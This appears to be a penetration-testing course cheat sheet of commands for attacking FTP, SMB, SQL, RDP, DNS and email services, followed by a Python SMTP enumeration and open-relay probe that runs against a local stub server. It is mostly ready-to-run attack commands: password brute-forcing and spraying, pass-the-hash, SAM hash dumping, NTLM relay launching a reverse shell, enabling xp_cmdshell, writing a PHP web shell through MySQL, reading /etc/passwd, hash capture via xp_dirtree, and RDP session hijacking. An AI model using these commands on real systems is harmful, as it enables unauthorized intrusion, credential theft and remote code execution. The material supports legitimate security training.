# Cheat Sheet - Attacking Common Services

## Attacking FTP

| Command | Description |
| --- | --- |
| `ftp 192.168.2.142` | Connect to the FTP server using the ftp client. |
| `nc -v 192.168.2.142 21` | Connect to the FTP server using netcat (banner grab and raw commands). |
| `hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142` | Brute-force the password of a single user against the FTP service. |

## Attacking SMB

| Command | Description |
| --- | --- |
| `smbclient -N -L //10.129.14.128` | Null-session share listing against the SMB service. |
| `smbmap -H 10.129.14.128` | Share enumeration (with permissions) using smbmap. |
| `smbmap -H 10.129.14.128 -r notes` | Recursively list the contents of the `notes` share using smbmap. |
| `smbmap -H 10.129.14.128 --download "notes\note.txt"` | Download a specific file from the share. |
| `smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"` | Upload a specific file to the share. |
| `rpcclient -U'%' 10.10.110.17` | Null session with rpcclient. |
| `./enum4linux-ng.py 10.10.11.45 -A -C` | Automated enumeration of the SMB service using enum4linux-ng. |
| `crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'` | Password spraying: one password against a list of users. |
| `impacket-psexec administrator:'Password123!'@10.10.110.17` | Get a SYSTEM shell over SMB with impacket-psexec (needs local admin rights and a writable `ADMIN$` share). |
| `crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec` | Execute a command over SMB using crackmapexec. |
| `crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users` | Enumerate logged-on users across the subnet. |
| `crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam` | Dump the local account hashes from the SAM database. |
| `crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE` | Pass-the-Hash: authenticate with the NT hash instead of the password. |
| `impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146` | Relay captured NTLM authentication to the target and dump its SAM database (the default action); only works when the target does not require SMB signing. |
| `impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>'` | Relay NTLM authentication and execute a PowerShell-based reverse shell on the target instead of dumping the SAM. |

## Attacking SQL Databases

| Command | Description |
| --- | --- |
| `mysql -u julio -pPassword123 -h 10.129.20.13` | Connect to the MySQL server (no space between `-p` and the password). |
| `sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30` | Connect to the MSSQL server from Windows (`-y`/`-Y` only set column display widths). |
| `sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h` | Connect to the MSSQL server from Linux using SQL Server authentication. |
| `sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h` | Connect to the MSSQL server from Linux when the server uses Windows authentication (`.\` selects the local machine's account database). |
| `mysql> SHOW DATABASES;` | Show all available databases in MySQL. |
| `mysql> USE htbusers;` | Select a specific database in MySQL. |
| `mysql> SHOW TABLES;` | Show all available tables in the selected database in MySQL. |
| `mysql> SELECT * FROM users;` | Select all entries from the `users` table in MySQL. |
| `sqlcmd> SELECT name FROM master.dbo.sysdatabases` | Show all available databases in MSSQL (in sqlcmd, end each batch with `GO` to run it). |
| `sqlcmd> USE htbusers` | Select a specific database in MSSQL. |
| `sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES` | Show all available tables in the selected database in MSSQL. |
| `sqlcmd> SELECT * FROM users` | Select all entries from the `users` table in MSSQL. |
| `sqlcmd> EXECUTE sp_configure 'show advanced options', 1` | Allow advanced options to be changed (requires sysadmin or `ALTER SETTINGS` permission). |
| `sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1` | Enable xp_cmdshell. |
| `sqlcmd> RECONFIGURE` | Run after each `sp_configure` call to apply the change. |
| `sqlcmd> xp_cmdshell 'whoami'` | Execute a system command from MSSQL; it runs as the SQL Server service account. |
| `mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'` | Write a file (here a PHP web shell) using MySQL; needs the `FILE` privilege, a path allowed by `secure_file_priv` and a web root writable by the MySQL service user. |
| `mysql> show variables like "secure_file_priv";` | Check the file-access restriction: an empty value means `LOAD_FILE`/`INTO OUTFILE` may use any path, a directory restricts them to that directory, and `NULL` disables them entirely. |
| `sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents` | Read local files in MSSQL. |
| `mysql> select LOAD_FILE("/etc/passwd");` | Read local files in MySQL. |
| `sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'` | Force the SQL Server service account to authenticate to our SMB share so its NetNTLM hash can be captured (e.g. with Responder). |
| `sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'` | Same hash capture using xp_subdirs. |
| `sqlcmd> SELECT srvname, isremote FROM sysservers` | Identify linked servers in MSSQL (`isremote` 1 = remote server, 0 = linked server). |
| `sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]` | Identify the user and its privileges used for the linked-server connection in MSSQL. |

## Attacking RDP

| Command | Description |
| --- | --- |
| `crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'` | Password spraying against the RDP service with crowbar. |
| `hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp` | Password spraying (one password, many users) against the RDP service with hydra. |
| `rdesktop -u admin -p password123 192.168.2.143` | Connect to the RDP service using rdesktop on Linux. |
| `tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}` | Attach another user's disconnected session to our own without their password; requires SYSTEM privileges on the host. |
| `net start sessionhijack` | Start a service (created beforehand with `sc.exe`, wrapping the `tscon` command) so that the hijack runs as SYSTEM. |
| `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f` | Enable "Restricted Admin Mode" on the target Windows host (value 0 = enabled; needs administrative rights), which is what makes RDP Pass-the-Hash possible. |
| `xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA` | Pass-the-Hash login over RDP using the NT hash instead of a password. |

## Attacking DNS

| Command | Description |
| --- | --- |
| `dig AXFR @ns1.inlanefreight.htb inlanefreight.htb` | Attempt an AXFR zone transfer against a specific name server. |
| `subfinder -d inlanefreight.com -v` | Passive subdomain enumeration with subfinder (queries public sources; it does not brute-force names). |
| `host support.inlanefreight.com` | DNS lookup for the specified subdomain. |

## Attacking Email Services

| Command | Description |
| --- | --- |
| `host -t MX microsoft.com` | DNS lookup of the mail servers (MX records) for the specified domain. |
| `dig mx inlanefreight.com \| grep "MX" \| grep -v ";"` | Same MX lookup with dig, filtered down to the answer records. |
| `host -t A mail1.inlanefreight.htb.` | DNS lookup of the IPv4 address for the specified mail host. |
| `telnet 10.10.110.20 25` | Connect to the SMTP server. |
| `smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7` | SMTP user enumeration using the RCPT TO command against the specified host (a 250 reply means the mailbox exists, 550 that it does not). |
| `python3 o365spray.py --validate --domain msplaintext.xyz` | Verify whether the specified domain uses Office 365. |
| `python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz` | Enumerate existing Office 365 users on the specified domain. |
| `python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz` | Password spraying against the found Office 365 users (`--count` attempts per lockout window of `--lockout` minutes). |
| `hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3` | Password spraying against the POP3 service (`-f` stops after the first valid login). |
| `swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213` | Send a test message through the SMTP server to check for open relay: a server that accepts mail from an unauthenticated client for destinations it is not responsible for is an open relay. |
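The RCPT TO enumeration and the open-relay check above are both just short SMTP conversations, so it is worth seeing the exchange itself rather than only the tool invocations. The following is an added example, not code from the original cheat sheet or from smtp-user-enum/swaks: a small client that runs both probes, driven against a constructed in-process stub SMTP server so it can be run offline. The stub's mailbox names (`julio`, `mail-admin`), its local domain and its reply strings are assumptions for the demonstration; a real server's replies differ in wording but not in the reply codes the client keys on.

```python
import socket
import threading

# Constructed stub data (assumptions for this example, not from the page).
STUB_USERS = {"julio", "mail-admin"}   # mailboxes the stub considers to exist
STUB_DOMAIN = "inlanefreight.htb"      # the only domain the stub delivers for


def _addr(arg: str) -> str:
    """'TO:<User@Host>' -> 'user@host'."""
    return arg.split(":", 1)[-1].strip().strip("<>").lower()


def _stub_smtp(srv: socket.socket, open_relay: bool) -> None:
    """Minimal SMTP responder for one client: EHLO/MAIL/RCPT/RSET/QUIT.

    open_relay=False models a hardened MTA that refuses foreign recipients;
    open_relay=True models the misconfiguration the swaks test looks for."""
    conn, _ = srv.accept()
    srv.close()
    with conn, conn.makefile("rb") as rf:
        conn.sendall(b"220 mail1.inlanefreight.htb ESMTP\r\n")
        while True:
            line = rf.readline()
            if not line:
                return
            verb, _, arg = line.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                reply = b"250 mail1.inlanefreight.htb\r\n"
            elif verb in ("MAIL", "RSET"):
                reply = b"250 OK\r\n"
            elif verb == "RCPT":
                user, _, domain = _addr(arg).partition("@")
                if domain != STUB_DOMAIN:
                    # relaying for a domain we do not host: refused unless misconfigured
                    reply = b"250 OK\r\n" if open_relay else b"554 5.7.1 Relay access denied\r\n"
                elif user in STUB_USERS:
                    reply = b"250 OK\r\n"                   # mailbox exists
                else:
                    reply = b"550 5.1.1 User unknown\r\n"   # the signal enumeration keys on
            elif verb == "QUIT":
                conn.sendall(b"221 Bye\r\n")
                return
            else:
                reply = b"500 Command not recognized\r\n"
            conn.sendall(reply)


def start_stub(open_relay: bool = False) -> tuple[str, int]:
    """Start the stub on an ephemeral loopback port and return (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    host, port = srv.getsockname()
    threading.Thread(target=_stub_smtp, args=(srv, open_relay), daemon=True).start()
    return host, port


def _cmd(sock: socket.socket, rf, line: str) -> int:
    """Send one SMTP command and return the numeric code of its (possibly multi-line) reply."""
    sock.sendall(line.encode() + b"\r\n")
    while True:
        reply = rf.readline()
        if not reply:
            raise ConnectionError("server closed the connection")
        if reply[3:4] != b"-":          # '250-' is a continuation line, '250 ' the last one
            return int(reply[:3])


def probe_smtp(host: str, port: int, domain: str, candidates: list[str],
               relay_target: str = "someone@external.example") -> dict:
    """RCPT-based user enumeration (what smtp-user-enum -M RCPT does), then the
    open-relay probe (outside sender to outside recipient, as with swaks)."""
    with socket.create_connection((host, port), timeout=5) as s, s.makefile("rb") as rf:
        if not rf.readline().startswith(b"220"):
            raise RuntimeError("no SMTP banner")
        _cmd(s, rf, "EHLO probe.local")
        _cmd(s, rf, "MAIL FROM:<probe@probe.local>")
        # One envelope may carry many RCPT TO commands, so each candidate costs one round trip.
        valid = [u for u in candidates if _cmd(s, rf, f"RCPT TO:<{u}@{domain}>") == 250]
        _cmd(s, rf, "RSET")
        _cmd(s, rf, "MAIL FROM:<notifications@probe.local>")
        relay_code = _cmd(s, rf, f"RCPT TO:<{relay_target}>")
        _cmd(s, rf, "QUIT")
    return {"valid_users": valid, "open_relay": relay_code == 250, "relay_code": relay_code}


def demo(open_relay: bool = False) -> dict:
    """Run both probes against a fresh stub; returns the probe result dictionary."""
    host, port = start_stub(open_relay)
    return probe_smtp(host, port, STUB_DOMAIN, ["julio", "mail-admin", "nobody", "root"])


if __name__ == "__main__":
    print(demo())                  # hardened stub: relay refused with 554
    print(demo(open_relay=True))   # misconfigured stub: relay accepted with 250
```

Two caveats when pointing this at a real server: many MTAs answer 250 to every RCPT TO (catch-all or deliberate anti-enumeration), in which case the enumeration yields nothing and the VRFY/EXPN methods of smtp-user-enum or the o365spray checks are the fallback; and a 250 on the relay probe is only meaningful when both the sender and the recipient are outside the domains the server hosts, which is why the probe uses a foreign recipient rather than the internal one from the swaks line above.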
